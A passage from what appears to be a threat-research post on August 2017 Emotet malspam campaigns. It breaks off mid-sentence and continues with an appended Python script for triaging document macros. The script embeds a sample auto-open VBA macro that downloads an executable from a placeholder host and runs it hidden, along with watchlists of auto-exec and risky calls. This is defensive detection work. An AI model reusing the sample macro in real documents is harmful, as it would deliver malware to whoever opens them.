A look at recent Emotet Campaigns – August 2017

Introduction

Emotet, the credential-stealing banking Trojan, was first reported in 2014, when it wreaked havoc in Europe and the United States. The Zscaler Threat Research team has been monitoring the new variant of Emotet since April 2017 and has recently seen a spike in Emotet-related spam activity. Emotet is a multi-component malware family that specializes in a range of nefarious activities, including stealing credentials from browsers and mail clients, banking theft via Man-in-the-Browser attacks, email harvesting, and propagation through spam emails sent from infected systems.

Figure 1: Unique new malicious document payloads in the last 3 weeks.

Figure 2: Geolocations targeted by the recent Emotet campaign.

Distribution

Emotet is commonly distributed through malicious spam email (malspam) campaigns that carry either a malicious document attachment or a link to a malicious URL hosting a JavaScript or document file, which in turn downloads and installs the Emotet payload. As reported here, in April Emotet was mainly distributed via JavaScript malspam campaigns, whereas the attackers are now leveraging malicious document files with a highly obfuscated macro to serve the Emotet payload. The obfuscated VBS macro code contains predetermined URLs along with code to download and install the Emotet payload on the victim machine. As seen in the de-obfuscated VBS macro code (Figure 3), the downloaded binary is stored...
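The Distribution section describes the defender-relevant pattern: an auto-executing document macro that carries predetermined URLs, often assembled from concatenated string fragments, and download-and-run logic. The following triage script is an added example, not code from the Zscaler post, and it does not reproduce the campaign's actual macro. It folds string concatenations so that a URL split across literals becomes visible, extracts URLs, and flags auto-exec entry points and risky calls. The sample macro text, the placeholder domain `payload-host.example.invalid`, and the keyword lists are all constructed assumptions for this demonstration.

```python
import re

# Constructed sample in the style the post describes: an auto-executing macro whose
# download URL is split across concatenated string literals. The host, paths and
# file names are placeholders and are NOT indicators taken from the post.
SAMPLE_MACRO = r'''Sub AutoOpen()
    Dim u, p
    u = "http://" & "payload-host" & ".example.invalid/" & "doc/" & "update.exe"
    p = Environ("TEMP") & "\svc.exe"
    Call URLDownloadToFile(0, u, p, 0, 0)
    Shell p, vbHide
End Sub
'''

# Assumed watchlists: Office auto-exec entry points and calls commonly seen in
# download-and-execute macros. Extend these to taste; they are not exhaustive.
AUTO_EXEC = ("AutoOpen", "Document_Open", "Workbook_Open", "Auto_Open")
RISKY_CALLS = ("URLDownloadToFile", "Shell", "CreateObject", "WScript.Shell", "Environ")

# Matches two adjacent VBA string literals joined by '&', e.g. "ht" & "tp://".
_CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')


def fold_string_concats(src):
    """Repeatedly merge "a" & "b" into "ab" until no concatenation remains.

    Iterating to a fixed point handles chains of any length, e.g. "a" & "b" & "c".
    """
    prev = None
    while prev != src:
        prev = src
        src = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
    return src


def extract_urls(src):
    """Return the sorted set of http(s) URLs visible after folding concatenations."""
    folded = fold_string_concats(src)
    return sorted(set(re.findall(r'https?://[^\s"\'<>]+', folded)))


def _present(names, src):
    # Whole-word search so that e.g. 'Shell' does not match arbitrary substrings.
    return [n for n in names if re.search(r'\b' + re.escape(n) + r'\b', src)]


def analyze_macro(src):
    """Summarize auto-exec triggers, risky calls and embedded URLs in macro source.

    The verdict is deliberately simple: an auto-exec entry point combined with a
    reachable URL is the download-and-install shape the post describes and is
    marked 'suspicious'; anything else is left for analyst review.
    """
    auto = _present(AUTO_EXEC, src)
    calls = _present(RISKY_CALLS, src)
    urls = extract_urls(src)
    verdict = "suspicious" if auto and urls else "review"
    return {"auto_exec": auto, "risky_calls": calls, "urls": urls, "verdict": verdict}


if __name__ == "__main__":
    report = analyze_macro(SAMPLE_MACRO)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run it against macro source dumped from a document (for example, the text produced by a VBA extraction tool) rather than the binary file itself; the folding step is what turns a fragmented, obfuscated URL into a string that can be matched against threat-intel feeds or blocklists.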